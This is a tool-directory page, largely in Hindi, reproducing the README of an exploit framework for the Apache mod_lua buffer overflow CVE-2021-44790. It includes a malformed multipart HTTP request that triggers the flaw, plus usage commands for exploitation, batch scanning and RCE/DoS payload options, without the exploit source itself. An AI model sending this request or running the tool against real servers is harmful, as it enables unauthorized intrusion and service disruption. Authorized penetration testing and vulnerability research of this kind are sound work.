Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
Web Vulnerability ScannersExploit FrameworksExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

रिपॉजिटरी देखें
113 दिन पहलेअभी तक समीक्षित नहीं

Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Advanced exploitation framework with fingerprinting, multi-stage scanning, plugin architecture, professional reporting, screenshot capture, SQLite database, and 95%+ confidence detection. Author: Sudeepa Wanigarathna.

साझा करें

🔥 CVE-2021-44790 - Apache mod_lua बफर ओवरफ्लो शोषण

Version Python License CVE Apache CVSS Author


📋 अवलोकन

Apache mod_lua बफर ओवरफ्लो शोषण, CVE-2021-44790 के लिए एक उन्नत, एंटरप्राइज़-ग्रेड शोषण मंच है - जो Apache HTTP Server 2.4.x mod_lua मॉड्यूल में एक गंभीर बफर ओवरफ्लो भेद्यता है। यह फ्रेमवर्क व्यापक फिंगरप्रिंटिंग, बुद्धिमान स्क्रिप्ट खोज, बहु-चरणीय स्कैनिंग और 95%+ कॉन्फिडेंस डिटेक्शन के साथ पेशेवर रिपोर्टिंग क्षमताएं प्रदान करता है।

⚡ मुख्य विशेषताएं


🎯 भेद्यता विवरण

तकनीकी विवरण

यह भेद्यता mod_lua मॉड्यूल में multipart/form-data अनुरोधों को संसाधित करते समय मौजूद है। lua_request_parsebody() फ़ंक्शन में इंटीजर अंडरफ्लो हीप-आधारित बफर ओवरफ्लो का कारण बन सकता है, जो संभावित रूप से रिमोट कोड निष्पादन की अनुमति देता है।

root@kitploit:~
POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 स्क्रीनशॉट

मुख्य इंटरफ़ेसफिंगरप्रिंट परिणाम

🚀 त्वरित प्रारंभ

स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

मूल उपयोग

root@kitploit:~
# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 विस्तृत उपयोग

कमांड लाइन विकल्प

root@kitploit:~
python3 exploit.py [TARGET] [OPTIONS]

उदाहरण

1. बुनियादी भेद्यता मूल्यांकन

root@kitploit:~
python3 exploit.py https://example.com --verbose --report all

2. कॉर्पोरेट वातावरण स्कैन

root@kitploit:~
python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. पूर्ण पैठ परीक्षण

root@kitploit:~
python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. बैच स्कैनिंग

root@kitploit:~
python3 exploit.py --batch targets.txt --config config.yaml

5. डेटाबेस क्वेरीज़

root@kitploit:~
# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ कॉन्फ़िगरेशन

config.yaml

root@kitploit:~
# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------

# Scan Settings
threads: 20                    # Concurrent threads
timeout: 10                    # Request timeout in seconds
retries: 3                     # Number of retry attempts
rate_limit: 10                 # Requests per second
max_depth: 3                   # Directory traversal depth
follow_redirects: true         # Follow HTTP redirects
verify_ssl: false              # Verify SSL certificates

# Network Settings
proxy: null                    # Proxy URL
http2: true                    # Enable HTTP/2 support
user_agent: random             # User-Agent (random/specific)
save_packets: false            # Save raw network packets

# Analysis Settings
research_mode: true            # Enable research database
verbose: false                 # Verbose output
scan_only: false               # Scan without exploitation
exploit: false                 # Enable exploitation
all_payloads: false            # Use all payloads

# Payload Settings
payloads:
  detection: true
  memory: true
  rce: true
  dos: false

# Report Settings
report_json: true
report_html: true
report_markdown: true
report_pdf: false
screenshot: false
reports_dir: reports

# Database Settings
database_path: luastorm.db
database_retention: 365

# Directory Settings
logs_dir: logs
screenshots_dir: screenshots

📊 रिपोर्ट

HTML डैशबोर्ड

  • इंटरैक्टिव चार्ट और टेबल
  • लक्ष्य फिंगरप्रिंट विज़ुअलाइज़ेशन
  • स्क्रिप्ट खोज सारांश
  • पेलोड निष्पादन समयरेखा
  • भेद्यता मूल्यांकन
  • जोखिम स्कोरिंग

JSON रिपोर्ट

root@kitploit:~
{
  "scan_id": "a1b2c3d4",
  "target": {
    "url": "https://example.com",
    "hostname": "example.com",
    "port": 443
  },
  "vulnerable": true,
  "risk_level": "Critical",
  "scan_duration": 45.23,
  "timestamp": "2026-08-04T15:45:23"
}

Markdown रिपोर्ट

  • मानव-पठनीय दस्तावेज़ीकरण
  • टेबल-प्रारूपित डेटा
  • आसान साझाकरण और एम्बेडिंग
  • वर्जन कंट्रोल के अनुकूल

🗄️ डेटाबेस स्कीमा

root@kitploit:~
-- Targets table
CREATE TABLE targets (
    id INTEGER PRIMARY KEY,
    scan_id TEXT UNIQUE,
    url TEXT,
    hostname TEXT,
    ip TEXT,
    port INTEGER,
    protocol TEXT,
    apache_version TEXT,
    lua_version TEXT,
    os TEXT,
    architecture TEXT,
    waf TEXT,
    cdn TEXT,
    vulnerable INTEGER,
    risk_level TEXT,
    scan_date TEXT,
    duration REAL
);

-- Scripts table
CREATE TABLE scripts (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    path TEXT,
    method TEXT,
    status_code INTEGER,
    content_type TEXT,
    response_time REAL,
    vulnerable INTEGER
);

-- Payloads table
CREATE TABLE payloads (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    script_id INTEGER,
    payload_name TEXT,
    payload_type TEXT,
    success INTEGER,
    response_time REAL,
    indicators TEXT,
    error TEXT
);

🔧 प्लगइन सिस्टम

प्लगइन बनाना

root@kitploit:~
# plugins/my_plugin.py
class MyPlugin:
    plugin_name = "my_plugin"
    plugin_version = "1.0"
    plugin_author = "Your Name"
    
    def __init__(self, config):
        self.config = config
    
    def execute(self, target_info):
        """Execute plugin logic"""
        return {
            'status': 'success',
            'message': 'Plugin executed',
            'data': {'target': target_info.url}
        }

🛡️ सुरक्षा संबंधी विचार

  • केवल अधिकृत उपयोग: यह टूल अधिकृत सुरक्षा परीक्षण के लिए है
  • कानूनी अनुपालन: परीक्षण से पहले सुनिश्चित करें कि आपके पास अनुमति है
  • जिम्मेदार प्रकटीकरण: भेद्यताओं की जिम्मेदारी से रिपोर्ट करें
  • डेटा सुरक्षा: सभी संवेदनशील डेटा स्थानीय रूप से संग्रहीत किया जाता है

⚠️ अस्वीकरण

root@kitploit:~
THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.

Unauthorized use against systems you do not own or have explicit permission to test
is illegal and unethical. The author assumes no responsibility for misuse, damage,
or legal consequences arising from the use of this tool.

By using this tool, you agree to:
1. Only test systems you own or have written permission to test
2. Comply with all applicable laws and regulations
3. Report findings responsibly
4. Not use this tool for malicious purposes

📈 प्रदर्शन मेट्रिक्स


🗺️ रोडमैप

संस्करण 2.1 (योजनाबद्ध)

  • अतिरिक्त CVE समर्थन
  • वेब UI इंटरफ़ेस
  • डॉकर कंटेनरीकरण
  • CI/CD पाइपलाइन
  • अधिक पेलोड वेरिएंट

संस्करण 2.2 (भविष्य)

  • मशीन लर्निंग एकीकरण
  • स्वचालित शोषण
  • क्लाउड-आधारित स्कैनिंग
  • टीम सहयोग सुविधाएं
  • उन्नत एवेज़न तकनीकें

🤝 योगदान

योगदान का स्वागत है! कृपया इन दिशानिर्देशों का पालन करें:

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं
  3. अपने बदलाव करें
  4. पुल रिक्वेस्ट सबमिट करें

विकास सेटअप

root@kitploit:~
# Clone your fork
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install development dependencies
pip install -r requirements-dev.txt

# Run tests
python -m pytest tests/

👨‍💻 लेखक

Sudeepa Wanigarathna

  • सुरक्षा शोधकर्ता और एथिकल हैकर
  • GitHub: @CerberusMrXi
  • फोकस: भेद्यता शोध और शोषण विकास

📄 लाइसेंस

केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए

यह सॉफ्टवेयर "जैसा है" प्रदान किया जाता है, बिना किसी प्रकार की वारंटी के, स्पष्ट या निहित।


⭐ इस प्रोजेक्ट का समर्थन करने के लिए इस रिपॉजिटरी को स्टार करें!

💡 कोई बग मिला? एक इश्यू खोलें

📧 संपर्क: [email protected]


सुरक्षा समुदाय के लिए ❤️ के साथ निर्मित

टूल डाउनलोड करें
फीचरविवरण
🔍 उन्नत फिंगरप्रिंटिंगApache संस्करण, mod_lua, OS, आर्किटेक्चर, WAF, CDN, कंटेनर, क्लाउड प्रदाता का पता लगाना
🎯 बुद्धिमान खोजrobots.txt, sitemap, HTML पार्सिंग, JavaScript निष्कर्षण सहित 7+ खोज तकनीकें
💥 बहु-चरणीय स्कैनिंगकनेक्शन → फिंगरप्रिंट → खोज → सत्यापन → शोषण → रिपोर्टिंग
🧩 विस्तारणीय प्लगइन सिस्टमभविष्य के CVEs के लिए आसान प्लगइन विकास
🌐 स्मार्ट HTTP इंजनकनेक्शन पूलिंग, पुनः प्रयास, HTTP/2 समर्थन, दर सीमित करना
📊 व्यापक रिपोर्टिंगइंटरैक्टिव डैशबोर्ड के साथ JSON, HTML, Markdown, PDF
🎨 सुंदर टर्मिनल UIप्रोग्रेस बार, टेबल और रंग-कोडित आउटपुट के साथ रिच लाइब्रेरी
💾 शोध डेटाबेसपूर्ण स्कैन इतिहास और क्वेरी समर्थन के साथ SQLite स्टोरेज
📸 स्क्रीनशॉट कैप्चरसाक्ष्य संग्रह के लिए स्वचालित वेबपेज स्क्रीनशॉट
🚀 उच्च प्रदर्शन20+ समवर्ती थ्रेड, 100+ कनेक्शन पूल
एट्रिब्यूटमान
CVE IDCVE-2021-44790
भेद्यताबफर ओवरफ्लो (Integer Underflow)
प्रभावित सॉफ्टवेयरApache HTTP Server 2.4.0 से 2.4.51
फिक्स्ड संस्करणApache HTTP Server 2.4.52 और बाद के संस्करण
घटकmod_lua मॉड्यूल
हमला वेक्टरनेटवर्क (रिमोट)
CVSS स्कोर9.8 (क्रिटिकल)
गोपनीयता प्रभावउच्च
अखंडता प्रभावउच्च
उपलब्धता प्रभावउच्च
शोषण परिपक्वताProof-of-Concept उपलब्ध
स्कैन प्रगतिHTML रिपोर्ट डैशबोर्ड
विकल्पविवरणउदाहरण
TARGETलक्ष्य URLhttp://target.com
--config FILEकॉन्फ़िगरेशन फ़ाइल--config config.yaml
--threads Nथ्रेड की संख्या--threads 30
--timeout Nअनुरोध टाइमआउट (सेकंड)--timeout 15
--proxy URLप्रॉक्सी URL--proxy http://127.0.0.1:8080
--verboseविस्तृत आउटपुट--verbose
--scan-onlyशोषण के बिना स्कैन करें--scan-only
--exploitशोषण सक्षम करें--exploit
--all-payloadsसभी पेलोड का उपयोग करें--all-payloads
--report FORMATरिपोर्ट प्रारूप (json/html/markdown/all)--report all
--output DIRआउटपुट निर्देशिका--output /path/to/reports/
--researchशोध मोड सक्षम करें--research
--database FILEडेटाबेस पथ--database luastorm.db
--screenshotस्क्रीनशॉट लें--screenshot
--batch FILEलक्ष्यों के साथ बैच फ़ाइल--batch targets.txt
--query SQLडेटाबेस क्वेरी निष्पादित करें--query "SELECT * FROM targets"
फीचरप्रदर्शन
फिंगरप्रिंटिंग< 2 सेकंड
स्क्रिप्ट खोज5-10 सेकंड
पेलोड परीक्षण1-5 सेकंड प्रति पेलोड
रिपोर्ट निर्माण< 1 सेकंड
डेटाबेस संचालन< 100ms
समवर्ती थ्रेड20+
कनेक्शन पूल100+